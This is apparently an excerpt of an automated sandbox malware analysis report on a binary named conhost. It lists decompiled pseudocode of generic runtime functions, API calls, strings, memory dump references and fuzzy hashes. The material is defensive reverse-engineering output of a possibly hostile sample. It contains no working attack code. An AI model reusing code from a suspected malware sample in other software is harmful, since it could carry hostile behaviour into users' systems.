                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Thread$Event$Context$HandleInformationObjectResumeSingleSuspendValueWait
                        • String ID:
                        • API String ID: 2335333592-0
                        • Opcode ID: 20659410290ff6e9b51c0a146a8f52cba0532b1fe1e4e8c13e0672c912a54f43
                        • Instruction ID: d0aa13c01b4ec6857d7a549cde9795805cbd9cfd2b54ebcf5b1fdbccf6703a5c
                        • Opcode Fuzzy Hash: 20659410290ff6e9b51c0a146a8f52cba0532b1fe1e4e8c13e0672c912a54f43
                        • Instruction Fuzzy Hash: 918193B290964281FB799B25D44337927A8FF48B98F5445B6DA7CAB3D5DF2CE880C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E6CB0 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 177COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E00007FF67FF6935E6CB0(intOrPtr* __rcx, void* __rdx) {
				void* _t13;

				_t13 = __rdx;
				if (__rdx - 0xfffffff9 > 0) goto 0x935e6d1f;
				E00007FF67FF6935E78B0(__rcx, __rdx,  *((intOrPtr*)( *__rcx - 0x18)), __rdx);
				if (_t13 == 0) goto 0x935e6cfc;
				if (_t13 == 1) goto 0x935e6d10;
				return memset(??, ??, ??);
			}




                        0x7ff6935e6cc5
                        0x7ff6935e6cd5
                        0x7ff6935e6cdc
                        0x7ff6935e6ce4
                        0x7ff6935e6cee
                        0x7ff6935e6d07

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$memset
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                        • API String ID: 438689982-1339558951
                        • Opcode ID: fb0e05b5eb08b727b81707ba047db16b2e10515fa45a4eea2f2462b34b55589b
                        • Instruction ID: fb8959845b86b066b0f4c06ee06fc39c1bfd431297478ca2934e0c7a3ee67be1
                        • Opcode Fuzzy Hash: fb0e05b5eb08b727b81707ba047db16b2e10515fa45a4eea2f2462b34b55589b
                        • Instruction Fuzzy Hash: EE511652F0939661F931AA6694060FD2258DF0DBD4B4841B2EE2CF77D6DD2CE982C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C3910 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 129COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpywcslen
                        • String ID: $0$@$\??\$basic_string::_M_construct null not valid
                        • API String ID: 982415701-2971582370
                        • Opcode ID: 85a96a3926fdf2f1929166f4ba83e6a6068a208a621f981d024bae726ae04d13
                        • Instruction ID: db026798ffb75b5fc3f74178bc0115e3d8db27c8dfcac7428b517fd889f2d96c
                        • Opcode Fuzzy Hash: 85a96a3926fdf2f1929166f4ba83e6a6068a208a621f981d024bae726ae04d13
                        • Instruction Fuzzy Hash: 17611632608BC595EB708F15E4523AAB7A8FBC8788F844265DA8C97B99DF7DC044CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D8580 Relevance: 13.6, APIs: 9, Instructions: 129COMMON
                        Download Yara Rule
                        C-Code - Quality: 29%
                        			E00007FF67FF6935D8580(void* __esi, long long* __rcx, void* __rdx) {
				long long _v72;
				void* _t12;
				long long* _t28;
				intOrPtr _t47;

				_t28 = __rcx;
				if (__rcx == 0) goto 0x935d8740;
				_t47 =  *((intOrPtr*)(__rcx));
				r13d = 0x16;
				if (_t47 == 0) goto 0x935d8674;
				if (_t47 == 0xffffffff) goto 0x935d8690;
				_t1 = _t47 + 0x98; // 0x98
				_t3 = _t47 + 0x70; // 0x70
				_v72 = _t1;
				r8d = 0xffffffff;
				_t12 = E00007FF67FF6935D84E0(0,  *((intOrPtr*)(_t47 + 0xa8)), _t3);
				r13d = _t12;
				if (_t12 != 0) goto 0x935d8674;
				if (TryEnterCriticalSection(??) == 0) goto 0x935d8780;
				if ( *((intOrPtr*)(_t47 + 8)) -  *((intOrPtr*)(_t47 + 0x10)) > 0) goto 0x935d8750;
				 *_t28 = 0;
				E00007FF67FF6935D7C40(1,  *((intOrPtr*)(_t47 + 0xa8)), _t3, _t1);
				CloseHandle(??);
				CloseHandle(??);
				LeaveCriticalSection(??);
				DeleteCriticalSection(??);
				DeleteCriticalSection(??);
				DeleteCriticalSection(??);
				free(??);
				return r13d;
			}







                        0x7ff6935d858e
                        0x7ff6935d8594
                        0x7ff6935d859a
                        0x7ff6935d859d
                        0x7ff6935d85a6
                        0x7ff6935d85b0
                        0x7ff6935d85b6
                        0x7ff6935d85c6
                        0x7ff6935d85cd
                        0x7ff6935d85d5
                        0x7ff6935d85db
                        0x7ff6935d85e0
                        0x7ff6935d85e5
                        0x7ff6935d8603
                        0x7ff6935d8613
                        0x7ff6935d8619
                        0x7ff6935d862b
                        0x7ff6935d863f
                        0x7ff6935d8649
                        0x7ff6935d864e
                        0x7ff6935d865e
                        0x7ff6935d8663
                        0x7ff6935d866a
                        0x7ff6935d866f
                        0x7ff6935d8685

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$Leave$DeleteEnter$CloseHandle$ReleaseSemaphorefree
                        • String ID:
                        • API String ID: 897415695-0
                        • Opcode ID: 98e52681dfc08f8f17fc14becac0e5c9275e4dc488c58711f086fe0bacfdf0f2
                        • Instruction ID: 7d23bfdf4fce7f9974df5ad4b98fc57590d5e18910937606aea362a683ced656
                        • Opcode Fuzzy Hash: 98e52681dfc08f8f17fc14becac0e5c9275e4dc488c58711f086fe0bacfdf0f2
                        • Instruction Fuzzy Hash: 1A518621A08A4680FA709B66D8067BA2698FF58BA8F5445B6DD7DE33D1CF3CE841D341
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D7F60 Relevance: 13.6, APIs: 9, Instructions: 81COMMON
                        Download Yara Rule
                        APIs
                        • calloc.MSVCRT(?,00007FF6936023E0,00000000,00007FF6935D6F57,?,?,?,00007FF6935D7085,?,?,?,?,00007FF6935D7225,?,00007FF6936023E0), ref: 00007FF6935D7F8C
                        • CreateSemaphoreA.KERNEL32 ref: 00007FF6935D7FCC
                        • CreateSemaphoreA.KERNEL32 ref: 00007FF6935D7FE3
                        • InitializeCriticalSection.KERNEL32(?,00007FF6936023E0,00000000,00007FF6935D6F57,?,?,?,00007FF6935D7085,?,?,?,?,00007FF6935D7225,?,00007FF6936023E0), ref: 00007FF6935D800B
                        • InitializeCriticalSection.KERNEL32(?,00007FF6936023E0,00000000,00007FF6935D6F57,?,?,?,00007FF6935D7085,?,?,?,?,00007FF6935D7225,?,00007FF6936023E0), ref: 00007FF6935D8012
                        • InitializeCriticalSection.KERNEL32(?,00007FF6936023E0,00000000,00007FF6935D6F57,?,?,?,00007FF6935D7085,?,?,?,?,00007FF6935D7225,?,00007FF6936023E0), ref: 00007FF6935D8019
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                        • String ID:
                        • API String ID: 2075313795-0
                        • Opcode ID: 578a62fee32b065a37f44c76b97850696633159970b86e5555a345ebaa48b1d8
                        • Instruction ID: ca3f2f1453164c866b21e9fbd3a4b0546fb16d419511fae39a05d30bec1656a8
                        • Opcode Fuzzy Hash: 578a62fee32b065a37f44c76b97850696633159970b86e5555a345ebaa48b1d8
                        • Instruction Fuzzy Hash: BD21B632B1571286FB65DB65F81AB7A2298EF48794F4481B6CE2C973C0DE3D9885C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CDA10 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON
                        Download Yara Rule
                        C-Code - Quality: 47%
                        			E00007FF67FF6935CDA10(void* __ebx, long __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
				void* _v32;
				intOrPtr _v108;
				void* _v144;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t26;
				intOrPtr _t42;
				long long _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				long long _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed long long _t55;
				long long _t59;
				intOrPtr _t64;
				struct _MEMORY_BASIC_INFORMATION* _t67;
				long long _t80;

				_t26 = __ebx;
				_t44 =  &_a16;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_v32 = _t44;
				_t20 = E00007FF67FF6935E10F0(_t19, 2, _t44, __rcx);
				r8d = 0x1b;
				0x935e0a68(_t51);
				_t52 = _v32;
				E00007FF67FF6935E10F0(_t20, 2, _t44, "Mingw-w64 runtime failure:\n");
				_t59 = _t44;
				0x935e09e8();
				0x935e0ab0();
				asm("o16 nop [eax+eax]");
				_t80 = _t59;
				if (_t26 <= 0) goto 0x935cdbb0;
				_t45 =  *0x936020e8; // 0xcbaac9f5e0
				_t46 = _t45 + 0x18;
				asm("o16 nop [eax+eax]");
				_t64 =  *_t46;
				if (_t64 - _t80 > 0) goto 0x935cdacc;
				_t7 = _t46 + 8; // 0x2954bdc0000
				_t8 =  *_t7 + 8; // 0x100f288de5e4ab2
				r8d =  *_t8;
				if (_t80 - _t64 +  *_t7 < 0) goto 0x935cdb53;
				_t47 = _t46 + 0x28;
				if (1 != _t26) goto 0x935cdab0;
				_t22 = E00007FF67FF6935CE780();
				if (_t47 == 0) goto 0x935cdbd2;
				_t48 =  *0x936020e8; // 0xcbaac9f5e0
				_t55 =  *0x936020e4 +  *0x936020e4 * 4 << 3;
				_t49 = _t48 + _t55;
				 *((long long*)(_t49 + 0x20)) = _t47;
				 *_t49 = 0;
				E00007FF67FF6935CE8B0(_t22,  *_t7);
				r8d = 0x30;
				_t50 =  *0x936020e8; // 0xcbaac9f5e0
				 *((long long*)(_t50 + _t55 + 0x18)) = _t80 + _t49;
				VirtualQuery(_t52, _t67, __rcx);
				_t42 = _t50;
				if (_t42 == 0) goto 0x935cdbb7;
				if (_t42 == 0) goto 0x935cdb4c;
				if (_t42 != 0) goto 0x935cdb60;
				 *0x936020e4 =  *0x936020e4 + 1;
				return _v108;
			}

























                        0x7ff6935cda10
                        0x7ff6935cda1a
                        0x7ff6935cda24
                        0x7ff6935cda29
                        0x7ff6935cda2e
                        0x7ff6935cda33
                        0x7ff6935cda38
                        0x7ff6935cda3d
                        0x7ff6935cda52
                        0x7ff6935cda57
                        0x7ff6935cda61
                        0x7ff6935cda69
                        0x7ff6935cda6f
                        0x7ff6935cda74
                        0x7ff6935cda7a
                        0x7ff6935cda8f
                        0x7ff6935cda94
                        0x7ff6935cda9a
                        0x7ff6935cdaa3
                        0x7ff6935cdaa7
                        0x7ff6935cdab0
                        0x7ff6935cdab6
                        0x7ff6935cdab8
                        0x7ff6935cdabc
                        0x7ff6935cdabc
                        0x7ff6935cdac6
                        0x7ff6935cdacf
                        0x7ff6935cdad5
                        0x7ff6935cdada
                        0x7ff6935cdae5
                        0x7ff6935cdaeb
                        0x7ff6935cdaf6
                        0x7ff6935cdafa
                        0x7ff6935cdafd
                        0x7ff6935cdb01
                        0x7ff6935cdb07
                        0x7ff6935cdb14
                        0x7ff6935cdb1d
                        0x7ff6935cdb24
                        0x7ff6935cdb29
                        0x7ff6935cdb2f
                        0x7ff6935cdb32
                        0x7ff6935cdb42
                        0x7ff6935cdb4a
                        0x7ff6935cdb4c
                        0x7ff6935cdb5b

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: QueryVirtual
                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                        • API String ID: 1804819252-1534286854
                        • Opcode ID: 5cda007aa49554ac35d177fdf0245f417c8f8c2cec54b3ae395e2d1ba7d2158f
                        • Instruction ID: 76f17b593330f8c685599f63fb565e4c90fa9a26dd1ca1ac824521b417e208cd
                        • Opcode Fuzzy Hash: 5cda007aa49554ac35d177fdf0245f417c8f8c2cec54b3ae395e2d1ba7d2158f
                        • Instruction Fuzzy Hash: 4451F832A0874692EF309B12E8436B977A8FF49B98F448175DE0EA7354EE3CE545C740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935DC0D0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %*.*s$%-*.*s$%.*s
                        • API String ID: 0-4054516066
                        • Opcode ID: 9c7f394b717ff8d1f3f37ca319c6d46d386816c32e0a13c87973d63059d2cdb8
                        • Instruction ID: f31fab358ccd3ff95d2f9e6bbe793096e6fb61701360d6ad7e19ad1f5daea5c3
                        • Opcode Fuzzy Hash: 9c7f394b717ff8d1f3f37ca319c6d46d386816c32e0a13c87973d63059d2cdb8
                        • Instruction Fuzzy Hash: 335197B7A1825286E7708F65D54277877A9EB0CB94F14C276DA5DEB698CE2CE8008B40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935DBCA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 110COMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E00007FF67FF6935DBCA0(void* __edx, void* __rax, void* __rcx, void* __r8) {
				signed int _v72;
				char _v80;
				intOrPtr _t19;
				intOrPtr _t28;
				void* _t40;
				void* _t48;
				void* _t52;
				void* _t53;
				char* _t62;

				_t52 = __rax;
				_t19 =  *((intOrPtr*)(__r8 + 0x10));
				_t53 = __r8;
				if (_t19 < 0) goto 0x935dbcbf;
				_t40 =  >  ? _t19 : __edx;
				r8d =  *((intOrPtr*)(__r8 + 0xc));
				if (( *(__r8 + 8) & 0x00006000) == 0x6000) goto 0x935dbdc8;
				if (_t40 - r8d < 0) goto 0x935dbd60;
				 *((intOrPtr*)(__r8 + 0xc)) = 0xffffffff;
				if (_t40 > 0) goto 0x935dbd1b;
				goto 0x935dbdad;
				_t62 = __rcx + __rax;
				E00007FF67FF6935DBC40(_v72 & 0xffff, __r8);
				if (_t40 == 0) goto 0x935dbdad;
				_v80 = 0;
				strlen(??);
				E00007FF67FF6935E0CE0( &_v72, _t62, _t52,  &_v80);
				_t48 = _t52;
				if (_t48 == 0) goto 0x935dbdad;
				if (_t48 >= 0) goto 0x935dbd00;
				_v72 =  *_t62;
				goto 0x935dbd05;
				asm("o16 nop [cs:eax+eax]");
				r8d = r8d - _t40 - 1;
				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
				if (0 != 0) goto 0x935dbcea;
				r8d = r8d - 1;
				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
				E00007FF67FF6935DBC40(0x20, _t53);
				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
				if ( *((intOrPtr*)(_t53 + 0xc)) != 0) goto 0x935dbd80;
				goto 0x935dbcea;
				E00007FF67FF6935DBC40(0x20, _t53);
				_t28 =  *((intOrPtr*)(_t53 + 0xc));
				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
				if (_t28 > 0) goto 0x935dbda0;
				return _t28;
			}












                        0x7ff6935dbca0
                        0x7ff6935dbcaa
                        0x7ff6935dbcb3
                        0x7ff6935dbcb8
                        0x7ff6935dbcbc
                        0x7ff6935dbcc2
                        0x7ff6935dbcd4
                        0x7ff6935dbcdd
                        0x7ff6935dbce3
                        0x7ff6935dbcf6
                        0x7ff6935dbcf8
                        0x7ff6935dbd0b
                        0x7ff6935dbd0e
                        0x7ff6935dbd15
                        0x7ff6935dbd1e
                        0x7ff6935dbd29
                        0x7ff6935dbd3a
                        0x7ff6935dbd3f
                        0x7ff6935dbd42
                        0x7ff6935dbd44
                        0x7ff6935dbd4f
                        0x7ff6935dbd54
                        0x7ff6935dbd56
                        0x7ff6935dbd60
                        0x7ff6935dbd63
                        0x7ff6935dbd6a
                        0x7ff6935dbd70
                        0x7ff6935dbd74
                        0x7ff6935dbd88
                        0x7ff6935dbd93
                        0x7ff6935dbd98
                        0x7ff6935dbd9a
                        0x7ff6935dbda8
                        0x7ff6935dbdad
                        0x7ff6935dbdb3
                        0x7ff6935dbdb8
                        0x7ff6935dbdc4

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %*.*S$%-*.*S$%.*S
                        • API String ID: 0-2115465065
                        • Opcode ID: 7e271c27211a09b8ae5f979a1daaaa6e2f32cd394a5110707addeabbafaf46e7
                        • Instruction ID: 73ae0045d7b6227d33540b4dff402a9f0d4298881bec86589311e25d4c83cdad
                        • Opcode Fuzzy Hash: 7e271c27211a09b8ae5f979a1daaaa6e2f32cd394a5110707addeabbafaf46e7
                        • Instruction Fuzzy Hash: C341D373B1824786E7709A26D40277962DAEF88B94F58C1B6DE2CDB7C9DE3DE4408700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C3550 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 129COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpywcslen
                        • String ID: 0$@$\??\$basic_string::_M_construct null not valid
                        • API String ID: 982415701-2209788446
                        • Opcode ID: 12c5a9589c110c7d1280ab66f4bda8f8eb496f91c2c944bc910a01eaae476777
                        • Instruction ID: 7a465bf72ae1029f67656287f322863102a8143f4ab3c1abdf9f14a4e4b1a414
                        • Opcode Fuzzy Hash: 12c5a9589c110c7d1280ab66f4bda8f8eb496f91c2c944bc910a01eaae476777
                        • Instruction Fuzzy Hash: F5613672608BC585EB708F15F4523AAB7A4FBC8788F844225DA8C97B99DF7CD144CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E38F0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 215stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcmp$strlen
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                        • API String ID: 3738950036-1697194757
                        • Opcode ID: c26d36d5394dd7cadfb9f516a75abf6982fffafdfa7c60d4e41d8d19651cde4a
                        • Instruction ID: 36ebc984ac2804d824bb874ca9ab5740b4a0ca03749b3517adb77dfa04fc2a7f
                        • Opcode Fuzzy Hash: c26d36d5394dd7cadfb9f516a75abf6982fffafdfa7c60d4e41d8d19651cde4a
                        • Instruction Fuzzy Hash: 9251EA92B04A8692FE309A26DD422F45298DF1CBE4F5C4671DE2CE77D5ED1CD9869300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E49A0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 202stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcmp$strlen
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                        • API String ID: 3738950036-1697194757
                        • Opcode ID: d2db66f1782767528f9d5823a76a691d716c7bc900fd341201d906c179976288
                        • Instruction ID: 051e7203b038ebea47f7f5a095424bd9f6ef31dc3ac7e979713c803b2c52e465
                        • Opcode Fuzzy Hash: d2db66f1782767528f9d5823a76a691d716c7bc900fd341201d906c179976288
                        • Instruction Fuzzy Hash: EA51C692B0569652EE309A26DD023F55299DF0CBE0F5C4271EE2CE77E5EE1CED869300
                        Uniqueness

                        Uniqueness Score: -1.00%

